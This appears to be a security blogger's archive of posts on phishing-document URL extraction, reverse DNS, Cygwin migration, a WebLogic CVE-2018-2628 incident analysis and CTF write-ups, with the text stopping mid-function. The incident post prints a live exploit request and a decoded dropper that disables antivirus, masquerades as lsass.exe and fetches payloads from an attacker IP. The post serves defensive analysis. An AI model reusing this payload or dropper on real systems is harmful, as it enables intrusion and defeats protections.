Author Archives: zam

Analyzing Phishing Email – Word XML File Analysis

Recently I observed a phishing email; its attachment on VirusTotal is below:
https://www.virustotal.com/#/file/cf027dd938f1a268f45f2ea786dc538ab47f35006fb12d0b64e0867bccf789c0/detection – clean

The file appears clean on VT. Interestingly, the Details section lists 2 URLs under OpenXML Doc Info.

To find these URLs yourself, first rename the Word document to a zip file, e.g. sample.doc to sample.zip (an OpenXML document is a zip archive of XML parts).

Then extract the zip file. The URLs can be found inside the file document.xml.rels (~/sample_folder/word/_rels/):

It may look simple if you know which file to look at and where it lives.

I was thinking: what if we could search for every URL/hyperlink in the XML content of the Word document, without having to open each file one by one?

To do that, we’ll use the zipdump and re-search (together with reextra) Python script tools by Didier Stevens:

  • zipdump
  • re-search
  • reextra

Download the Python scripts mentioned above into one place. Then execute the command below:

    ./zipdump.py -D sample.zip | ./re-search.py -f -n url -u

    The command above dumps the content of every file inside the zip archive and pipes it through re-search, which applies its built-in URL regex (-n url) and lists each match once (-u).
    As you can see below, these are all the URLs contained in the Word doc:
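    The same search can be done without the Didier Stevens tools, using only the standard library. This is an added example, not code from the post: it opens the document as a zip, scans every .xml and .rels part for http(s) URLs, drops the schema namespace URLs that every document carries, and reports the rest per part. The document it scans is constructed in memory, and example.invalid is a placeholder host.

```python
import io
import re
import zipfile
from typing import Dict, List

# http(s) URL inside an XML attribute value or text node; the class stops at the
# quote or bracket that closes the attribute.
URL_RE = re.compile(rb'https?://[^\s"\'<>]+')

# Namespace / schema hosts present in every OpenXML file; not interesting.
NOISE = (b"schemas.openxmlformats.org", b"schemas.microsoft.com",
         b"www.w3.org", b"purl.org")


def extract_urls_from_docx(data: bytes) -> Dict[str, List[str]]:
    """Return {zip part name: [urls]} for every XML/rels part that carries a URL."""
    found: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.endswith((".xml", ".rels")):
                continue
            urls: List[str] = []
            for match in URL_RE.findall(zf.read(info.filename)):
                if any(n in match for n in NOISE):
                    continue
                url = match.decode("utf-8", "replace")
                if url not in urls:          # keep first occurrence only
                    urls.append(url)
            if urls:
                found[info.filename] = urls
    return found


def build_sample_docx() -> bytes:
    """Constructed minimal document: one external hyperlink and one external
    OLE object relationship in word/_rels/document.xml.rels."""
    rels = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            b'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
            b'Target="http://example.invalid/login/verify.php" TargetMode="External"/>'
            b'<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
            b'Target="http://example.invalid/files/update.doc" TargetMode="External"/>'
            b'</Relationships>')
    document = (b'<?xml version="1.0"?>'
                b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                b'<w:body><w:p><w:r><w:t>Please verify your account.</w:t></w:r></w:p></w:body>'
                b'</w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    b'<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, urls in extract_urls_from_docx(build_sample_docx()).items():
        print(part)
        for u in urls:
            print("   ", u)
```

    To run it on a real sample, pass the bytes of the .doc/.docx file (read in binary mode) to extract_urls_from_docx instead of the constructed archive.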

    Check bulk IP for reverse DNS (rDNS)

    Recently I came across a list of IPs related to CoinHive, and I wanted to check which hostnames they resolve to. We can do that with the dig command, which can perform reverse DNS (rDNS) lookups.

    Reverse DNS (rDNS) is a method of resolving an IP address into a domain name, just as the domain name system (DNS) resolves domain names into associated IP addresses.

    I found this script at this site:

    #!/bin/bash
    # Reverse-resolve every IP address passed as an argument (one per argument).
    for item
    do
        domain=$(dig -x "$item" +short)
        if [ -n "$domain" ]; then
            echo "$item" - "$domain"
        else
            echo "$item" result is NULL
        fi
    done
    

    Just save the code above on your Linux/*nix machine (as reverse_dns) and run the command below:

    [email protected]:~# cat ip.txt | xargs bash reverse_dns

    The result should be like this:

    Import & export installed Cygwin packages

    Recently I changed to a new workstation. I had installed a bunch of Cygwin packages on my old one.

    So I thought: can I somehow migrate my installed Cygwin packages from my old workstation to the new one?

    The answer is yes. Follow along on this wonderful journey XD

    First, you’ll need to save a list of what you have installed in Cygwin on the old workstation.
    To do this, open the Cygwin terminal/console and run the command below:

    grep " 1$" /etc/setup/installed.db | awk '{printf "%s%s",sep,$1; sep=","} END{print ""}' > cygwin_packages.txt

    This dumps a comma-separated list of the Cygwin packages installed on your workstation and saves it to a text file.

    Next, go to your Cygwin home folder (commonly located at “C:\cygwin64\home\“), open the “cygwin_packages.txt” file we saved before and copy all of its content.

    Next, on your new workstation, make sure you have downloaded the latest Cygwin installer, “setup-x86.exe” (32-bit) or “setup-x86_64.exe” (64-bit).

    Then open a Windows cmd prompt and change directory to where you saved the Cygwin installer. In my case, I saved it in my Downloads folder, “C:\Users\Zam\Downloads>”.

    Then run the command below in cmd, pasting the content of cygwin_packages.txt inside the double quotes:

    setup-x86.exe -q -P "<paste the cygwin_packages.txt content here>"

    You should see the Cygwin GUI open and a UAC permission pop-up:

    Click “Yes”, go through the “Next” buttons and wait until the installation finishes.

    Analyzing Oracle WebLogic attack

    Recently we received an alert from our WAF about an attack against our environment.
    Further review of the alert found that the attacker was using the Oracle WebLogic RCE deserialization vulnerability (CVE-2018-2628).

    We observed that the attacker included some sort of PowerShell command in their request:

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java version="1.8.0_131" class="java.beans.XMLDecoder">
    <void class="java.lang.ProcessBuilder">
      <array class="java.lang.String" length="3">
        <void index="0">
          <string>cmd.exe</string>
        </void>
        <void index="1">
          <string>/c</string>
        </void>
        <void index="2">
          <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
        </void>
      </array>
        <void method="start"/>
    </void>
    </java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>

    It looks like the PowerShell command is Base64-encoded for obfuscation.
    I used https://gchq.github.io/CyberChef/ to decode the Base64:

    $OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL+ $OS";IEX $WC.DownloadString('http://111.230.229.226/images/test/DL.php');

    It seems it tried to fetch the file DL.php from http://111.230.229.226/images/test/DL.php.
    Let’s try to grab that file:

    [email protected]:~# wget http://111.230.229.226/images/test/DL.php
    --2018-04-29 19:50:27--  http://111.230.229.226/images/test/DL.php
    Connecting to 111.230.229.226:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    2018-04-29 19:50:28 ERROR 404: Not Found.

    Hmm.. Error 404? Is it a real 404,
    or are we missing something here?

    Let’s analyze the command carefully:

    PS C:\Users\Fossil\Desktop> $OS=(GWmi Win32_OperatingSystem).Caption;
    PS C:\Users\Fossil\Desktop> $WC=New-Object Net.WebClient;
    PS C:\Users\Fossil\Desktop> $WC.Headers['User-Agent']="PowerShell/WL+ $OS";
    PS C:\Users\Fossil\Desktop>
    PS C:\Users\Fossil\Desktop> echo $OS;
    Microsoft Windows 7 Ultimate
    PS C:\Users\Fossil\Desktop> echo $WC.Headers['User-Agent'];
    PowerShell/WL+ Microsoft Windows 7 Ultimate

    We can see that the attacker sets a specific User-Agent when fetching the file.
    That’s why our direct wget/curl of the file failed.

    So what we have to do is set the same User-Agent when fetching the file.
    In this case, I’m using curl to fetch it:

    [email protected]:~# curl -v -H User-Agent: "PowerShell/WL Microsoft Windows 7 Professional" http://111.230.229.226/images/test/DL.php
    *   Trying 111.230.229.226...
    * Connected to 111.230.229.226 (111.230.229.226) port 80 (#0)
    > GET /images/test/DL.php HTTP/1.1
    > Host: 111.230.229.226
    > Accept: */*
    > User-Agent: PowerShell/WL Microsoft Windows 7 Professional
    <
    < HTTP/1.1 200 OK
    < Date: Sun, 29 Apr 2018 11:50:23 GMT
    < Server: Apache/2.2.21 (Win32) PHP/5.3.10
    < X-Powered-By: PHP/5.3.10
    < Content-Length: 2539
    < Content-Type: text/html
    <
    $EncodedCompressedFile = '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';$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress);$UncompressedFileBytes = New-Object Byte[](3948);$Null=$DeflatedStream.Read($UncompressedFileBytes, 0, 3948);([Text.Encoding]::ASCII.GetString($UncompressedFileBytes)) | IEX;

    See? When we fetched the file without that User-Agent, it failed with a 404 error.
    And again, we see another Base64-encoded blob here.

    But what is it?
    I’m not an expert at explaining this, but TL;DR, it converts the Base64-encoded string into a memory stream, decompresses it and executes the result. I guess ¯\_(ツ)_/¯

    So, to see what happens when this command executes, we can use the Python script below to decode it.
    With this script we can basically see what that Base64 is doing.

    Take the Base64 from above and paste it into the encoded parameter, as in the example below:

    #!/usr/bin/env python3
    import base64
    import zlib

    # Paste the Base64 string assigned to $EncodedCompressedFile here
    encoded = "<paste the Base64 string here>"

    # [Convert]::FromBase64String
    decoded = base64.b64decode(encoded)

    # IO.Compression.DeflateStream: the data is a raw DEFLATE stream with no
    # zlib/gzip header, which is what the negative window size (-15) tells zlib
    decompressed = zlib.decompress(decoded, -15)

    # [Text.Encoding]::ASCII.GetString
    print(decompressed.decode("ascii", errors="replace"))

    Save the script and run it with the command below:

    C:\Users\Fossil\Desktop>python decodeb64.py > output_DL_php.txt

    This saves all the output from your CMD to a text file for easier reading.
    P/S: you can rename output_DL_php.txt to any filename you want.
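    Both layers seen so far can be peeled in one go: the -E argument in the request (Base64 of the script as UTF-16LE, which is why that blob is full of “A” characters) and the $EncodedCompressedFile blob inside DL.php (Base64 of a raw DEFLATE stream). This is an added example, not code from the post or from the attacker; the two-stage sample it decodes is constructed in make_sample() and is harmless.

```python
import base64
import re
import zlib
from typing import List, Optional, Tuple

# Shape of the stage-two loader seen in DL.php: a Base64 literal assigned to
# $EncodedCompressedFile and later fed through DeflateStream + IEX.
STAGE_RE = re.compile(r"\$EncodedCompressedFile\s*=\s*'([A-Za-z0-9+/=]+)'")


def decode_encoded_command(b64: str) -> str:
    """Decode the argument of powershell.exe -E / -EncodedCommand.

    -E expects Base64 of the script encoded as UTF-16LE; the zero high byte
    of every ASCII character is why the blob in the request is full of 'A's.
    """
    return base64.b64decode(b64).decode("utf-16-le")


def inflate_stage(script: str) -> Optional[str]:
    """Return the next stage hidden in $EncodedCompressedFile, or None.

    The blob is Base64 of a raw DEFLATE stream (no zlib/gzip header), which
    is what DeflateStream produces and what wbits=-15 tells zlib to expect.
    """
    m = STAGE_RE.search(script)
    if m is None:
        return None
    raw = base64.b64decode(m.group(1))
    return zlib.decompress(raw, -15).decode("ascii", errors="replace")


def unwrap(b64_command: str) -> List[str]:
    """Peel every layer and return [stage1, stage2, ...] as readable text."""
    stages = [decode_encoded_command(b64_command)]
    while True:
        nxt = inflate_stage(stages[-1])
        if nxt is None:
            return stages
        stages.append(nxt)


def make_sample() -> Tuple[str, str]:
    """Constructed, harmless two-stage chain built the same way the real one
    was: returns (Base64 for -E, plaintext of the final stage)."""
    final = "Write-Host '[i] constructed final stage'\n"
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)            # raw DEFLATE
    deflated = comp.compress(final.encode("ascii")) + comp.flush()
    stage1 = (
        "$EncodedCompressedFile = '%s';"
        "$DeflatedStream = New-Object IO.Compression.DeflateStream("
        "[IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),"
        "[IO.Compression.CompressionMode]::Decompress);"
        "([Text.Encoding]::ASCII.GetString($UncompressedFileBytes)) | IEX;"
        % base64.b64encode(deflated).decode("ascii")
    )
    return base64.b64encode(stage1.encode("utf-16-le")).decode("ascii"), final


if __name__ == "__main__":
    b64, _ = make_sample()
    for i, stage in enumerate(unwrap(b64), 1):
        print("--- stage %d ---" % i)
        print(stage)
```

    For a real request, pass the string after -E straight to unwrap(); each returned stage is what the next PowerShell process would have executed.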

    Let’s see what’s inside the text file:

    $MutexName = 'Global\20180419'
    $bCreated = $Flase
    $hMutex = New-Object System.Threading.Mutex($true,$MutexName,[Ref]$bCreated)
    if ($bCreated)
    {
            Start-Sleep 180
            $hMutex.ReleaseMutex()
    }
    else
    {
            Exit
    }
    
    
    #Update
    $WmiName = 'root\cimv2:PowerShell_Command'
    $mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
    if ($mPId -ne $Null) {
            Write-Host "[i] Old PId: $mPId"
            Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
    }
    $WmiName = 'root\default:PowerShell_Command'
    $mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
    if ($mPId -ne $Null) {
            Write-Host "[i] Old PId: $mPId"
            Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
    }
    
    
    $SrvName = "ZhuDongFangYu", "NisSrv","MsMpSvc","WdNisSvc","WinDefend", "MBAMService","a2AntiMalware"
    foreach ($Srv in $SrvName)
    {
    #       Set-Service -Name $Srv -StartupType Disabled -ErrorAction SilentlyContinue
    #       Stop-Service -Name $Srv -Force -ErrorAction SilentlyContinue
            $Null = SC.exe Config $Srv Start= Disabled
            $Null = SC.exe Stop $Srv
    }
    $ProName = "ZhuDongFangYu", "MsMpEng","MpCmdRun","msseces","NisSrv","MSASCui", "mbamtray","mbamservice","a2service"
    foreach ($Pro in $ProName)
    {
            Get-Process -Name $Pro -ErrorAction SilentlyContinue | Stop-Process -Force
    }
    
    $Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\SpyNet" /v "SpyNetReporting" /t REG_DWORD /d 0 /f
    $Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\Exclusions\Paths" /v "$Env:WinDir" /t REG_DWORD /d 0 /f
    $Null = Reg.exe Add "HKLM\SoftWare\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    $Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\NisSrv /v Start /t REG_DWORD /d 4 /f
    $Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\MsMpSvc /v Start /t REG_DWORD /d 4 /f
    $Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
    $Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
    
    
    $Script = "Start-Sleep (Get-Random -Min 60 -Max 300);IEX (New-Object Net.WebClient).DownloadString('http://111.230.229.226/images/def/DL.ps1');";
    $ScriptBytes = [System.Text.Encoding]::Unicode.GetBytes($Script);
    $EncodedScript = [System.Convert]::ToBase64String($ScriptBytes);
    
    $Path = "$Env:SystemRoot\System32\WindowsPowerShell\v1.0\PowerShell.exe"
    $Argv = "-NoP -NonI -EP ByPass -W Hidden -E $EncodedScript"
    $Process = Start-Process -FilePath $Path -ArgumentList $Argv -WindowStyle Hidden -PassThru
    $ProcessId = $($Process.Id)
    if ($ProcessId -ne $Null)
    {
            Write-Host "[+] Neutrino PS Process Id is $ProcessId"
    }
    else
    {
            Write-Host "[-] Neutrino PS Process Id is NULL"
    }
    
    
    #Downloader
    $x86 = "http://111.230.229.226/images/test/x86.exe"
    $x64 = "http://111.230.229.226/images/test/x64.exe"
    $File = "$Env:WinDir\Temp\lsass.eXe"
    $WC = New-Object System.Net.WebClient
    
    
    $Dir = "$Env:WinDir\Temp";
    if (!(Test-Path $Dir)){ New-Item $Dir -Type Directory; }
    if (!((Get-Item $File -Force) -is [IO.FileInfo])) { Remove-Item $File -Force -ErrorAction SilentlyContinue }
    
    
    $OS = (Get-WmiObject Win32_ComputerSystem).SystemType
    $SO = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
    if (($OS -Match '64') -Or ($SO -Match '64'))
    {
            Write-Host "[i] OS 64-bit"
            $WC.DownloadFile($x64, $File)
            if ((Test-Path $File) -eq $False)
            {
                    $WC.DownloadFile("http://111.230.229.226/images/test/x64_VMP.exe", $File)
            }
    }
    else
    {
            Write-Host '[i] OS 32-bit'
            $WC.DownloadFile($x86, $File)
            if ((Test-Path $File) -eq $False)
            {
                    $WC.DownloadFile("http://111.230.229.226/images/test/x86_VMP.exe", $File)
            }
    }
    
    if (Test-Path $File)
    {
            Write-Host '[+] Downloaded'
            $Null = NetSH Firewall Add AllowedProgram $File "Windows Update" Enable
            IEX $WC.DownloadString('http://111.230.229.226/images/test/WMI.ps1')
    }
    else
    {
            Write-Host '[-] Fail To Download'
    }

    As you can see, the command does a bunch of stuff that I’m too lazy to explain 😉
    Hope you enjoyed reading this.
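    The decoded stage is a compact list of defense-evasion techniques: Defender policy and exclusion keys written with reg.exe, AV services disabled via sc.exe and their Start values set to 4, a hidden -EP ByPass -W Hidden -E child, IEX of a DownloadString, a binary masquerading as lsass.exe under Temp, and a netsh firewall exception. The scanner below is an added example (not from the post) that turns those observations into line-level rules over a PowerShell script; the sample it scans is constructed from lines of the stage shown above with example.invalid in place of the real host.

```python
import re
from typing import Dict, List, Pattern, Tuple

# Each rule mirrors one thing the decoded DL.php stage did. Whitespace and case
# are matched loosely because PowerShell and reg.exe/sc.exe are case-insensitive.
RULES: List[Tuple[str, Pattern]] = [
    ("defender_policy_disable",
     re.compile(r"Policies\\Microsoft\\Windows Defender.*DisableAntiSpyware.*/d\s+1\b", re.I)),
    ("defender_exclusion_added",
     re.compile(r"Windows Defender\\Exclusions\\Paths", re.I)),
    ("av_service_disabled",
     re.compile(r"\bsc(\.exe)?\s+config\s+\S+\s+start=\s*disabled|Set-Service\b.*-StartupType\s+Disabled", re.I)),
    ("av_service_start_reg",
     re.compile(r"Services\\(WinDefend|MsMpSvc|NisSrv|WdNisSvc)\s+/v\s+Start\s+/t\s+REG_DWORD\s+/d\s+4\b", re.I)),
    ("firewall_exception_added",
     re.compile(r"\bnetsh\s+firewall\s+add\s+allowedprogram", re.I)),
    ("hidden_encoded_child",
     re.compile(r"-EP\s+ByPass.*-W\s+Hidden.*-E\s+\S+", re.I)),
    ("download_and_iex",
     re.compile(r"\bIEX\b.*\.DownloadString\(", re.I)),
    ("lsass_masquerade_in_temp",
     re.compile(r"\\Temp\\lsass\.exe", re.I)),
    ("wmi_class_storage",
     re.compile(r"root\\(cimv2|default):\w+", re.I)),
]


def scan_powershell(script: str) -> Dict[str, List[int]]:
    """Map each rule name to the 1-based line numbers that triggered it."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(script.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def verdict(hits: Dict[str, List[int]], min_rules: int = 3) -> str:
    """Several distinct techniques in one script is the signal; a single hit
    (one Set-Service in an admin script) is ordinary activity."""
    return "defense-evasion" if len(hits) >= min_rules else "benign-or-unknown"


# Constructed sample: lines taken from the decoded stage, C2 host replaced.
SAMPLE = r"""$WmiName = 'root\cimv2:PowerShell_Command'
$Null = SC.exe Config $Srv Start= Disabled
$Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\Exclusions\Paths" /v "$Env:WinDir" /t REG_DWORD /d 0 /f
$Null = Reg.exe Add "HKLM\SoftWare\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
$Script = "Start-Sleep (Get-Random -Min 60 -Max 300);IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/DL.ps1');";
$Argv = "-NoP -NonI -EP ByPass -W Hidden -E $EncodedScript"
$File = "$Env:WinDir\Temp\lsass.eXe"
$Null = NetSH Firewall Add AllowedProgram $File "Windows Update" Enable
Write-Host '[+] Downloaded'
"""

# Constructed benign admin snippet: one hit only, should not be flagged.
ADMIN = "Set-Service -Name Spooler -StartupType Disabled\nStop-Service Spooler\n"

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE), ("admin", ADMIN)):
        h = scan_powershell(text)
        print(label, verdict(h))
        for name, lines in h.items():
            print("   ", name, "at lines", lines)
```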

    IOCs:

    017eba5231a63782bdd1d7c8beff5b0b *DL.php
    bee2f2223729166c264037a82fa4fed3 *DL.ps1
    b5065178c574936a1b7e477929ba1075 *lsass.eXe
    1dd6bc7549913b64595540bc77059415 *Neutrino.ps1
    dfcb19949d55d35e5d3f1dd569218ce4 *WMI.ps1
    ec5e6097038be59e7311f9de8d6354d6 *x64.exe
    35cb2b208085bcb5b93ea6420f01c92b *x64_VMP.exe
    2129a8287215558e5870c7cc89d0a8fe *x86.exe
    c11dbd4777d6ec2b434c424e201c0e6b *x86_VMP.exe

    References:
    https://gist.githubusercontent.com/strazzere/5faa709a3db9e1dcf3b5/raw/42b98a918bac3725934bcfa3087ac5936d9b88d1/decrypt.py
    http://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/

    Wargames 2017 – Challenge 12 : ezfile sharing

    Challenge 12 : ezfile sharing

    question for challenge 12

    and the hint for this challenge:

    hint for challenge 12

    One of our teammates was fuzzing around the website and found a “.git” folder.
    It seems related to the hint.
    We tried to browse the folder/path:

    .git folder/path

    As a “layman” (please guys, don’t try this at home, or any other place, wkwkwkwk), I went too far by downloading the whole git folder (recursively):

    download all git folder content

    Let’s see what info git -help can provide us with:

    git help menu

    Hmm.. let’s see if “git show” can provide any clue…

    and.. profit! XD

    So the flag is: “wgmy:{AdminGitGudPlease}”

    Wargames 2017 – Challenge 9 : unreachable

    The question is:

    "The critical server seems unreachable. The sysadmin tries to identify the cause of it..but weird..he is doing it backwardly."
    http://files.wargames.my/2/p100.7zv
    question for challenge 2


    And the hint given to us:

    hint for challenge 2


    So… RFC 792, something related to ICMP/ping, yada yada.
    So we open the pcap file in Wireshark and view only the ICMP protocol:

    open pcap using wireshark & then filter ICMP only

    We can see ICMP traffic involving 2 IPs: 192.168.1.8 & 192.168.1.10.
    After digging around, I found some “unique differences” in the ping identification number, at offset 0010, in the packets from IP 192.168.1.8.

    Let’s use tshark to see it clearly:

    tshark -r pcap1-100_1_copy.pcapng -x 'icmp and ip.src==192.168.1.8' | grep 0010

    use tshark & grep offset 0010

    As noted in the hint above:
    “he is tracing backwardly.”

    The flag is: flag_is_p!ngp0ng~
    but actually… the flag is: p!ngp0ng~
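    The identifier is the 16-bit field at offset 4 of the ICMP header, and a normal ping keeps it constant for the whole session, so data smuggled through it shows up as an identifier that changes on every echo request. The parser below is an added example, not part of the writeup: it reads raw IPv4/ICMP packets (no link-layer header), collects the identifiers sent by one host, flags the changing pattern, and reassembles the bytes backwards as the hint called for. The capture is constructed in make_capture() and carries the made-up message “c0vert”.

```python
import struct
from typing import List, Tuple


def build_echo(src: str, dst: str, ident: int, seq: int) -> bytes:
    """Constructed raw IPv4 + ICMP echo request, no link-layer header, no payload.
    Checksums are left at 0 because nothing here validates them."""
    ip_src = bytes(int(o) for o in src.split("."))
    ip_dst = bytes(int(o) for o in dst.split("."))
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28, 0, 0, 64, 1, 0, ip_src, ip_dst)
    icmp_hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    return ip_hdr + icmp_hdr


def parse_icmp(packet: bytes) -> Tuple[str, str, int, int, int]:
    """Return (src, dst, icmp_type, identifier, sequence) from a raw IPv4/ICMP packet."""
    ihl = (packet[0] & 0x0F) * 4                  # IPv4 header length in bytes
    if packet[9] != 1:                            # protocol field: 1 == ICMP
        raise ValueError("not an ICMP packet")
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    typ, _code, _cksum, ident, seq = struct.unpack("!BBHHH", packet[ihl:ihl + 8])
    return src, dst, typ, ident, seq


def echo_ids_from(packets: List[bytes], src: str) -> List[int]:
    """Identifier field of every echo request sent by src, in capture order."""
    ids = []
    for p in packets:
        s, _d, typ, ident, _q = parse_icmp(p)
        if s == src and typ == 8:
            ids.append(ident)
    return ids


def looks_like_covert_channel(ids: List[int]) -> bool:
    """One identifier per session is normal; a changing one carries data."""
    return len(set(ids)) > 1


def ids_to_text(ids: List[int], backwards: bool = True) -> str:
    """Concatenate the 16-bit identifiers and read them back-to-front."""
    raw = b"".join(struct.pack("!H", i) for i in ids)
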